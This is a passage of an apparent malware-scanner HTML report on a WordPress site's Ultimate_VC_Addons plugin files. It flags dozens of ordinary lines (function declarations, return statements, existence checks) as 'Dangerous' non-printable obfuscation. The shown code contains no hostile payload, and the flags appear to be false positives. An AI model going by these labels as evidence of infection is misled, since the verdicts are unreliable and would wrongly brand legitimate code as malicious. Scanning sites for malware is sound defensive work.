</span><span style="color: #007700">) { </span><span style="color: #0000BB">$b</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 218</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_border_radius_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #FF8000">/*$mode,*/ </span><span style="color: #0000BB">$unit</span><span style="color: #007700">, </span><span style="color: #FF8000">/* $default_value,*/ </span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$placeholder </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 247</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_border_param_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$dashicon</span><span style="color: #007700">, </span><span style="color: #FF8000">/*$mode,*/ </span><span style="color: #0000BB">$unit</span><span style="color: #007700">, </span><span style="color: #FF8000">/* $default_value,*/ </span><span style="color: #0000BB">$default_value</span><span style="color: #007700">, </span><span style="color: #0000BB">$key</span><span style="color: #007700">, </span><span style="color: #0000BB">$id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_border_param_scripts</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'add_shortcode_param' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_border_callback</span><span style="color: #007700">( </span><span style="color: #0000BB">$settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_487").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/class-bsf-envato-activate.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 33</span><br><table id="file_488" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$content</span><span style="color: #007700">; } } function </span><span style="color: #0000BB">bsf_envato_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) { </span><span style="color: #0000BB">$bsf_envato_activate </span><span style="color: #007700">= </span><span style="color: #0000BB">BSF_Envato_Activate</span><span style="color: #007700">::</span><span style="color: #0000BB">instance</span><span style="color: #007700">(); return </span><span style="color: #0000BB">$bsf_envato_activate</span><span style="color: #007700">-></span><span style="color: #0000BB">envato_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$envato_activation_url</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 246</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">envato_activation_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$form_data </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 257</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$envato_activation_url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 264</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$current_url</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_redirect_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$current_url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$token</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_token</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$token</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 307</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validate_token</span><span style="color: #007700">( </span><span style="color: #0000BB">$token</span><span style="color: #007700">, </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 320</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 340</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">process_envato_activation</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_message</span><span style="color: #007700">( </span><span style="color: #0000BB">$message </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 382</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mesage</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_message</span><span style="color: #007700">( </span><span style="color: #0000BB">$key </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return isset( </span><span style="color: #0000BB">$message</span><span style="color: #007700">[ </span><span style="color: #0000BB">$key </span><span style="color: #007700">] ) ? </span><span style="color: #0000BB">$message</span><span style="color: #007700">[ </span><span style="color: #0000BB">$key </span><span style="color: #007700">] : </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 394</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 396</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inline_alternate_method_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$bsf_product_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$content</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 422</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternate_method_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$content </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$content</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">instance</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">envato_register</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_envato_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_envato_activate</span><span style="color: #007700">-></span><span style="color: #0000BB">envato_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">$instance</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that initializes required actions </span><span style="color: #007700">and </span><span style="color: #0000BB">hooks</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 75</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">envato_register</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_488").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/includes/system-info.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_489" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_systeminfo</span><span style="color: #007700">() { </span><span style="color: #0000BB">$table </span><span style="color: #007700">= </span><span style="color: #DD0000">'<div class="bsf-system-info-wrapper">'</span><span style="color: #007700">; </span><span style="color: #0000BB">ob_start</span><span style="color: #007700">(); </span><span style="color: #0000BB">bsf_systeminfo</span><span style="color: #007700">(); </span><span style="color: #0000BB">$table </span><span style="color: #007700">.= </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">(); </span><span style="color: #0000BB">$table </span><span style="color: #007700">.= </span><span style="color: #DD0000">'</div>'</span><span style="color: #007700">; return </span><span style="color: #0000BB">$table</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_systeminfo</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'phpversion' </span><span style="color: #007700">) ) ? </span><span style="color: #0000BB">floatval</span><span style="color: #007700">( </span><span style="color: #0000BB">phpversion</span><span style="color: #007700">() ) : </span><span style="color: #DD0000">'Not sure'</span><span style="color: #007700">; </span><span style="color: #0000BB">?></span></td></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'curl_version' </span><span style="color: #007700">) ) ? </span><span style="color: #DD0000">'bsf-alert' </span><span style="color: #007700">: </span><span style="color: #DD0000">''</span><span style="color: #007700">; </span><span style="color: #0000BB">?></span>"></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 188</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'curl_version' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 283</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_systeminfo</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 290</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$table</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 40</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'memory_get_usage' </span><span style="color: #007700">) ? </span><span style="color: #0000BB">round</span><span style="color: #007700">( </span><span style="color: #0000BB">memory_get_usage</span><span style="color: #007700">() / </span><span style="color: #0000BB">1024 </span><span style="color: #007700">/ </span><span style="color: #0000BB">1024</span><span style="color: #007700">, </span><span style="color: #0000BB">2 </span><span style="color: #007700">) : </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_489").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/includes/helpers.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:21</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 36</span><br><table id="file_490" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$product_name</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 103</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">( </span><span style="color: #0000BB">get_template_directory_uri</span><span style="color: #007700">() . </span><span style="color: #DD0000">'/admin/bsf-core/'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/' </span><span style="color: #007700">) . </span><span style="color: #0000BB">$append</span><span style="color: #007700">;</span>
</span>
